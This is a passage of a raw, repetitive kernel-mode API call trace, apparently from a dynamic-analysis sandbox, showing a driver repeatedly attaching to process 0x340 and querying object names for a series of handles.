PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.921] ObReferenceObjectByHandle (in: Handle=0x728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b66a20, HandleInformation=0x0) returned 0x0 [0289.921] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.921] PsReleaseProcessExitSynchronization () returned 0x2 [0289.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc6 [0289.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.922] ObfDereferenceObject (Object=0xffffe00069b66a20) returned 0x800e [0289.922] IoCompleteRequest () returned 0x0 [0289.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.922] PsAcquireProcessExitSynchronization () returned 0x0 [0289.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.922] ObReferenceObjectByHandle (in: Handle=0x72c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069be1430, HandleInformation=0x0) returned 0x0 [0289.922] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.922] PsReleaseProcessExitSynchronization () returned 0x2 [0289.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc5 [0289.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.922] ObfDereferenceObject (Object=0xffffe00069be1430) returned 0x800e [0289.922] IoCompleteRequest () returned 0x0 [0289.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.922] PsAcquireProcessExitSynchronization () returned 0x0 [0289.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.922] ObReferenceObjectByHandle (in: Handle=0x734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b66dd0, HandleInformation=0x0) returned 0x0 [0289.922] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.922] PsReleaseProcessExitSynchronization () returned 0x2 [0289.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc4 [0289.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.922] ObfDereferenceObject (Object=0xffffe00069b66dd0) returned 0x800e [0289.922] IoCompleteRequest () returned 0x0 [0289.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.922] PsAcquireProcessExitSynchronization () returned 0x0 [0289.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.922] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000727ff840, HandleInformation=0x0) returned 0x0 [0289.922] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.922] PsReleaseProcessExitSynchronization () returned 0x2 [0289.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc3 [0289.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.922] ObfDereferenceObject (Object=0xffffe000727ff840) returned 0x8008 [0289.922] IoCompleteRequest () returned 0x0 [0289.922] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.922] PsAcquireProcessExitSynchronization () returned 0x0 [0289.922] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.922] ObReferenceObjectByHandle (in: Handle=0x73c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000727ffa00, HandleInformation=0x0) returned 0x0 [0289.922] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.922] PsReleaseProcessExitSynchronization () returned 0x2 [0289.922] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc2 [0289.922] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.922] ObfDereferenceObject (Object=0xffffe000727ffa00) returned 0x800a [0289.922] IoCompleteRequest () returned 0x0 [0289.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.923] PsAcquireProcessExitSynchronization () returned 0x0 [0289.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.923] ObReferenceObjectByHandle (in: Handle=0x758, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e32340, HandleInformation=0x0) returned 0x0 [0289.923] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.923] PsReleaseProcessExitSynchronization () returned 0x2 [0289.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc1 [0289.923] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.923] ObfDereferenceObject (Object=0xffffe00069e32340) returned 0x800c [0289.923] IoCompleteRequest () returned 0x0 [0289.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.923] PsAcquireProcessExitSynchronization () returned 0x0 [0289.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.923] ObReferenceObjectByHandle (in: Handle=0x75c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e3a090, HandleInformation=0x0) returned 0x0 [0289.923] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.923] PsReleaseProcessExitSynchronization () returned 0x2 [0289.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffc0 [0289.923] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.923] ObfDereferenceObject (Object=0xffffe00069e3a090) returned 0x800e [0289.923] IoCompleteRequest () returned 0x0 [0289.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.923] PsAcquireProcessExitSynchronization () returned 0x0 [0289.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.923] ObReferenceObjectByHandle (in: Handle=0x764, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fa8590, HandleInformation=0x0) returned 0x0 [0289.923] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.923] PsReleaseProcessExitSynchronization () returned 0x2 [0289.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffbf [0289.923] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.923] ObfDereferenceObject (Object=0xffffe00069fa8590) returned 0x800e [0289.923] IoCompleteRequest () returned 0x0 [0289.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.923] PsAcquireProcessExitSynchronization () returned 0x0 [0289.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.923] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f578e0, HandleInformation=0x0) returned 0x0 [0289.923] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.923] PsReleaseProcessExitSynchronization () returned 0x2 [0289.923] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffbe [0289.923] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.923] ObfDereferenceObject (Object=0xffffe00069f578e0) returned 0x8008 [0289.923] IoCompleteRequest () returned 0x0 [0289.923] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.923] PsAcquireProcessExitSynchronization () returned 0x0 [0289.923] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.923] ObReferenceObjectByHandle (in: Handle=0x774, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f95400, HandleInformation=0x0) returned 0x0 [0289.924] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.924] PsReleaseProcessExitSynchronization () returned 0x2 [0289.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffbd [0289.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.924] ObfDereferenceObject (Object=0xffffe00069f95400) returned 0x800c [0289.924] IoCompleteRequest () returned 0x0 [0289.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.924] PsAcquireProcessExitSynchronization () returned 0x0 [0289.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.924] ObReferenceObjectByHandle (in: Handle=0x778, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f20550, HandleInformation=0x0) returned 0x0 [0289.924] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.924] PsReleaseProcessExitSynchronization () returned 0x2 [0289.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffbc [0289.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.924] ObfDereferenceObject (Object=0xffffe00069f20550) returned 0x800e [0289.924] IoCompleteRequest () returned 0x0 [0289.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.924] PsAcquireProcessExitSynchronization () returned 0x0 [0289.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.924] ObReferenceObjectByHandle (in: Handle=0x77c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f41190, HandleInformation=0x0) returned 0x0 [0289.924] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.924] PsReleaseProcessExitSynchronization () returned 0x2 [0289.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffbb [0289.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.924] ObfDereferenceObject (Object=0xffffe00069f41190) returned 0x800e [0289.924] IoCompleteRequest () returned 0x0 [0289.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.924] PsAcquireProcessExitSynchronization () returned 0x0 [0289.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.924] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f49cc0, HandleInformation=0x0) returned 0x0 [0289.924] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.924] PsReleaseProcessExitSynchronization () returned 0x2 [0289.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffba [0289.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.924] ObfDereferenceObject (Object=0xffffe00069f49cc0) returned 0x800c [0289.924] IoCompleteRequest () returned 0x0 [0289.924] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.924] PsAcquireProcessExitSynchronization () returned 0x0 [0289.924] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.924] ObReferenceObjectByHandle (in: Handle=0x794, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a58650, HandleInformation=0x0) returned 0x0 [0289.924] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.924] PsReleaseProcessExitSynchronization () returned 0x2 [0289.924] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb9 [0289.924] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.924] ObfDereferenceObject (Object=0xffffe00069a58650) returned 0x8018 [0289.925] IoCompleteRequest () returned 0x0 [0289.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.925] PsAcquireProcessExitSynchronization () returned 0x0 [0289.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.925] ObReferenceObjectByHandle (in: Handle=0x798, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0a09d0, HandleInformation=0x0) returned 0x0 [0289.925] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.925] PsReleaseProcessExitSynchronization () returned 0x2 [0289.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb8 [0289.925] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.925] ObfDereferenceObject (Object=0xffffe0006a0a09d0) returned 0x8018 [0289.925] IoCompleteRequest () returned 0x0 [0289.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.925] PsAcquireProcessExitSynchronization () returned 0x0 [0289.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.925] ObReferenceObjectByHandle (in: Handle=0x7b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a28e550, HandleInformation=0x0) returned 0x0 [0289.925] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.925] PsReleaseProcessExitSynchronization () returned 0x2 [0289.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb7 [0289.925] ObQueryNameString (in: Object=0xffffe0006a28e550, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.925] ObfDereferenceObject (Object=0xffffe0006a28e550) returned 0x7ffe [0289.925] IoCompleteRequest () returned 0x0 [0289.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.925] PsAcquireProcessExitSynchronization () returned 0x0 [0289.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.925] ObReferenceObjectByHandle (in: Handle=0x7c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4975a0, HandleInformation=0x0) returned 0x0 [0289.925] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.925] PsReleaseProcessExitSynchronization () returned 0x2 [0289.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb6 [0289.925] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.925] ObfDereferenceObject (Object=0xffffe0006a4975a0) returned 0x800a [0289.925] IoCompleteRequest () returned 0x0 [0289.925] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.925] PsAcquireProcessExitSynchronization () returned 0x0 [0289.925] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.925] ObReferenceObjectByHandle (in: Handle=0x7c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0afe70, HandleInformation=0x0) returned 0x0 [0289.925] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.925] PsReleaseProcessExitSynchronization () returned 0x2 [0289.925] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb5 [0289.925] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.925] ObfDereferenceObject (Object=0xffffe0006a0afe70) returned 0x8018 [0289.925] IoCompleteRequest () returned 0x0 [0289.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.926] PsAcquireProcessExitSynchronization () returned 0x0 [0289.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.926] ObReferenceObjectByHandle (in: Handle=0x7d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0ac510, HandleInformation=0x0) returned 0x0 [0289.926] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.926] PsReleaseProcessExitSynchronization () returned 0x2 [0289.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb4 [0289.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.926] ObfDereferenceObject (Object=0xffffe0006a0ac510) returned 0x800e [0289.926] IoCompleteRequest () returned 0x0 [0289.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.926] PsAcquireProcessExitSynchronization () returned 0x0 [0289.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.926] ObReferenceObjectByHandle (in: Handle=0x7d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0b02a0, HandleInformation=0x0) returned 0x0 [0289.926] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.926] PsReleaseProcessExitSynchronization () returned 0x2 [0289.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb3 [0289.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.926] ObfDereferenceObject (Object=0xffffe0006a0b02a0) returned 0x8018 [0289.926] IoCompleteRequest () returned 0x0 [0289.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.926] PsAcquireProcessExitSynchronization () returned 0x0 [0289.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.926] ObReferenceObjectByHandle (in: Handle=0x7d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0aa990, HandleInformation=0x0) returned 0x0 [0289.926] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.926] PsReleaseProcessExitSynchronization () returned 0x2 [0289.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb2 [0289.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.926] ObfDereferenceObject (Object=0xffffe0006a0aa990) returned 0x800e [0289.926] IoCompleteRequest () returned 0x0 [0289.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.926] PsAcquireProcessExitSynchronization () returned 0x0 [0289.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.926] ObReferenceObjectByHandle (in: Handle=0x7dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0b2f20, HandleInformation=0x0) returned 0x0 [0289.926] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.926] PsReleaseProcessExitSynchronization () returned 0x2 [0289.926] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb1 [0289.926] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.926] ObfDereferenceObject (Object=0xffffe0006a0b2f20) returned 0x8018 [0289.926] IoCompleteRequest () returned 0x0 [0289.926] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.926] PsAcquireProcessExitSynchronization () returned 0x0 [0289.926] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.926] ObReferenceObjectByHandle (in: Handle=0x7e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069dd1790, HandleInformation=0x0) returned 0x0 [0289.927] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.927] PsReleaseProcessExitSynchronization () returned 0x2 [0289.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffb0 [0289.927] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.927] ObfDereferenceObject (Object=0xffffe00069dd1790) returned 0x800b [0289.927] IoCompleteRequest () returned 0x0 [0289.927] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.927] PsAcquireProcessExitSynchronization () returned 0x0 [0289.927] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.927] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00073222f20, HandleInformation=0x0) returned 0x0 [0289.927] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.927] PsReleaseProcessExitSynchronization () returned 0x2 [0289.927] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffaf [0289.927] ObQueryNameString 